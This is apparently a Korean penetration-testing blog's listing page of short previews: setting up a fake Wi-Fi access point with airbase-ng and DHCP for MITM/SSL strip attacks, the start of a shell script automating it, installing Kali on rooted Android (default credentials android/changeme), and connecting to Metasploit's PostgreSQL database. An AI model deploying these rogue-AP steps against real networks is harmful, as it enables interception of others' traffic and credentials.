본문 바로가기

kali linux

FAKE AP 생성과 MITM / SSL strip 공격 FAKE AP 생성과 MITM / SSL strip 공격 최초 무선 랜카드 연결 및 연결 확인#> iwconfig or ifconfig 공격자 GateWay 확인(192.168.0.1)#> route -n DHCP server 설치#> apt-get install isc-dhcp-server DHCP 설정 파일 생성#> vi /etc/dhcpd.conf 아래 내용 추가 airmon 활성화 (wlan interface 확인)#> airmon-ng start wlan0 fake ap 실행 (mon interface 확인)#> airbase-ng -c 채널 -e freewifi mon0 만들어진 fake ap 설정 (at interface 확인)#> ifconfig at0 192.168.1.1 netmask .. 더보기
Rogue AP + SSLStrip 쉘스크립트 [ Fake AP, MITM 공격 ] 2015/01/05 - [모의해킹] - FAKE AP 생성과 MITM / SSL strip 공격 # 위의 글을 쉘스크립트로 만들면 #!/bin/bash echo "authoritative; default-lease-time 600; max-lease-time 7200; subnet 192.168.1.0 netmask 255.255.255.0 { option routers 192.168.1.1; option subnet-mask 255.255.255.0;" > /etc/dhcpd.conf echo "make your fake ap name (ESSID)" read string echo "option domain-name \"$string\"; option domain-name-servers 192.168... 더보기
안드로이드 기기에 Kali linux 설치 @ 루팅된 안드로이드 기기 (above 2.1ver) @ 최소 5gb 이상의 메모리공간 # Putty 다운로드 # VNCviewer 다운로드 # Linux deploy 다운 및 설치 # 약간의 환경 설정변경 및 확인 후 설치 # 설치완료 후 Kali 시작 # VNC 와 SSH 서비스를 이용할 수 있음 (default id와 password는 android / changeme) @ ssh @ putty를 이용한 접속 @ VNC @ vnc viewer를 이용한 접속 더보기
Kali linux 에서 postgresql DB 접속 kali linux 에서 postgresql db 접속 1. password 확인 # cd /opt/metasploit/apps/pro/ui/config # vi database.yml 2. 배쉬 등록 # vi ~/.bashrc 아래부분 추가 후 확인 export PGPASSWORD=[password] # ~/.bashrc # echo $PGPASSWORD 3. 설정파일 변경 # cd /etc/postgresql/9.x/main # vi pg_hba.conf line 90:localallallmd5 :wq 4. 데몬 재시작 # service postgresql restart # psql -U msf3 msf3 5. 성공 msf3=> 더보기